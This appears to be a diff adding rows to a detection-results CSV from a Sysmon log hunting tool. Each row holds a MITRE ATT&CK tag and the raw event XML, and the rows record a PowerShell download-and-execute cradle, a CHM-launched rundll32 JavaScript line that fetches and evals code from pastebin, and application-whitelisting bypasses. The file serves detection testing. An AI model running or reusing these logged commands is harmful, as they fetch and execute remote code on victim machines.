+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Program Compatibility Assistant</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\pcalua.exe&quot;  -a c:\Windows\system32\calc.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-4FB5-5CD8-0000-0020F2350100</Data>
+    <Data Name=""LogonId"">0x135f2</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=ABB6319976D9702E0C80978D51C0AEE88A33D201,MD5=D652BA887500816431566B524292ECCB,SHA256=65446AF2997779DB6CDAEFB2ABC2994CA9F2A2477C882BC3A5F828BBFFB83CEE,IMPHASH=256CD8CEDFD4FCB3BC9DB32E27E5923A</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-516B-5CD8-0000-001087E41600</Data>
+    <Data Name=""ParentProcessId"">3788</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell  -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:23.507565Z"">
+    </TimeCreated>
+    <EventRecordID>4912</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:23.380</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6623-5D3F-0000-0010BC068800</Data>
+    <Data Name=""ProcessId"">3000</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">powershell  -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6623-5D3F-0000-001011F68700</Data>
+    <Data Name=""ParentProcessId"">5816</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1564126781.211276,2019-07-26T11:39:41.211276+04:00,,Threat,Low,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe &gt; nul &amp;&amp; %%TEMP%%\out.exe javascript:&quot;\..\mshtml RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WinHttp.WinHttpRequest.5.1&quot;);h.Open(&quot;GET&quot;,&quot;http://pastebin.com/raw/y2CjnRtH&quot;,false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im out.exe&quot;,0,true);} )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-26T07:39:14.935857Z"">
+    </TimeCreated>
+    <EventRecordID>4353</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""5924"" ThreadID=""6056"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-26 07:39:14.853</Data>
+    <Data Name=""ProcessGuid"">747F3D96-AE22-5D3A-0000-001004D84E00</Data>
+    <Data Name=""ProcessId"">5548</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /c copy /Y C:\Windows\system32\rundll32.exe %%TEMP%%\out.exe &gt; nul &amp;&amp; %%TEMP%%\out.exe javascript:&quot;\..\mshtml RunHTMLApplication &quot;;document.write();h=new%%20ActiveXObject(&quot;WinHttp.WinHttpRequest.5.1&quot;);h.Open(&quot;GET&quot;,&quot;http://pastebin.com/raw/y2CjnRtH&quot;,false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%%20ActiveXObject(&quot;WScript.Shell&quot;).Run(&quot;cmd /c taskkill /f /im out.exe&quot;,0,true);}</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-ABD5-5D3A-0000-0020EB990F00</Data>
+    <Data Name=""LogonId"">0xf99eb</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-AE22-5D3A-0000-001096B24E00</Data>
+    <Data Name=""ParentProcessId"">1504</Data>
+    <Data Name=""ParentImage"">C:\Windows\hh.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\hh.exe&quot; C:\Users\IEUser\Desktop\Fax Record N104F.chm</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1074] Data Staged - Process,1564436004.104732,2019-07-30T01:33:24.104732+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( powershell  -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot; )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-07-29T21:33:23.507565Z"">
+    </TimeCreated>
+    <EventRecordID>4912</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2640"" ThreadID=""3476"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-07-29 21:33:23.380</Data>
+    <Data Name=""ProcessGuid"">747F3D96-6623-5D3F-0000-0010BC068800</Data>
+    <Data Name=""ProcessId"">3000</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">powershell  -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
+    <Data Name=""LogonId"">0x413182</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-6623-5D3F-0000-001011F68700</Data>
+    <Data Name=""ParentProcessId"">5816</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">cmd  /c powershell -c &quot;(New-Object Net.WebClient).DownloadFile(&apos;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt&apos;,&apos;Default_File_Path.ps1&apos;);IEX((-Join([IO.File]::ReadAllBytes(&apos;Default_File_Path.ps1&apos;)|ForEach-Object{[Char]$_})))&quot;</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32.exe  url.dll,FileProtocolHandler file:///C:/programdata/calc.hta)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T13:38:00.523670Z"">
+    </TimeCreated>
+    <EventRecordID>16395</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""1996"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 13:38:00.523</Data>
+    <Data Name=""ProcessGuid"">365ABB72-21B8-5CD8-0000-0010BADE2600</Data>
+    <Data Name=""ProcessId"">3856</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32.exe  url.dll,FileProtocolHandler file:///C:/programdata/calc.hta</Data>
+    <Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
+    <Data Name=""LogonId"">0x13a10</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
+    <Data Name=""ParentProcessId"">2936</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe  url.dll,FileProtocolHandler file:///C:/programdata/calc.hta )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T13:38:00.523670Z"">
+    </TimeCreated>
+    <EventRecordID>16395</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""1996"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 13:38:00.523</Data>
+    <Data Name=""ProcessGuid"">365ABB72-21B8-5CD8-0000-0010BADE2600</Data>
+    <Data Name=""ProcessId"">3856</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32.exe  url.dll,FileProtocolHandler file:///C:/programdata/calc.hta</Data>
+    <Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
+    <Data Name=""LogonId"">0x13a10</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
+    <Data Name=""ParentProcessId"">2936</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1557668280.712733,2019-05-12T17:38:00.712733+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32.exe  url.dll,FileProtocolHandler file:///C:/programdata/calc.hta )",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T13:38:00.523670Z"">
+    </TimeCreated>
+    <EventRecordID>16395</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2032"" ThreadID=""1996"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 13:38:00.523</Data>
+    <Data Name=""ProcessGuid"">365ABB72-21B8-5CD8-0000-0010BADE2600</Data>
+    <Data Name=""ProcessId"">3856</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">rundll32.exe  url.dll,FileProtocolHandler file:///C:/programdata/calc.hta</Data>
+    <Data Name=""CurrentDirectory"">c:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-1596-5CD8-0000-0020103A0100</Data>
+    <Data Name=""LogonId"">0x13a10</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-2006-5CD8-0000-0010E0912300</Data>
+    <Data Name=""ParentProcessId"">2936</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1553028075.144276,2019-03-20T00:41:15.144276+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T20:41:15.144276Z"">
+    </TimeCreated>
+    <EventRecordID>1966251</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""1564"" ThreadID=""1252"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-03-19 20:36:04.206</Data>
+    <Data Name=""ProcessGuid"">365ABB72-52B4-5C91-0000-0010355B0100</Data>
+    <Data Name=""ProcessId"">1628</Data>
+    <Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
+    <Data Name=""Description"">Windows Command Processor</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">cmd.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">365ABB72-528D-5C91-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-528D-5C91-0000-001062560000</Data>
+    <Data Name=""ParentProcessId"">484</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\services.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\services.exe</Data>
+  </EventData>
+</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1602935016.312645,2020-10-17T15:43:36.312645+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot;)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-10-17T11:43:36.306601Z"">
+    </TimeCreated>
+    <EventRecordID>417079</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3500"" ThreadID=""4688"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-10-17 11:43:36.303</Data>
+    <Data Name=""ProcessGuid"">747F3D96-D8E8-5F8A-0000-00102CEF7200</Data>
+    <Data Name=""ProcessId"">840</Data>
+    <Data Name=""Image"">C:\Windows\SysWOW64\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot;</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Roaming\</Data>
+    <Data Name=""User"">MSEDGEWIN10\IEUser</Data>
+    <Data Name=""LogonGuid"">747F3D96-CA8D-5F8A-0000-0020D1090A00</Data>
+    <Data Name=""LogonId"">0xa09d1</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=6778DAD71C8B06264CF2929A5242D2612D3EB026,MD5=2F633406BC9875AA48D6CC5884B70862,SHA256=26E68D4381774A6FD0BF5CA2EACEF55F2AB28536E3176A1C6362DFFC68B22B8A,IMPHASH=BB17B2FBBFF4BBF5EBDCA7D0BB9E4A5B</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-D8E5-5F8A-0000-0010E1BC7200</Data>
+    <Data Name=""ParentProcessId"">2920</Data>
+    <Data Name=""ParentImage"">C:\Users\IEUser\AppData\Roaming\WINWORD.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Users\IEUser\AppData\Roaming\WINWORD.exe --xStart</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1565785034.89393,2019-08-14T16:17:14.893930+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( &quot;C:\Windows\system32\rundll32.exe&quot; zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab})",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-08-14T12:17:14.614739Z"">
+    </TimeCreated>
+    <EventRecordID>10674</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2004"" ThreadID=""4480"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-08-14 12:17:14.447</Data>
+    <Data Name=""ProcessGuid"">747F3D96-FBCA-5D53-0000-0010B8664100</Data>
+    <Data Name=""ProcessId"">2476</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\system32\rundll32.exe&quot; zipfldr.dll,RouteTheCall shell:::{769f9427-3cc6-4b62-be14-2a705115b7ab}</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
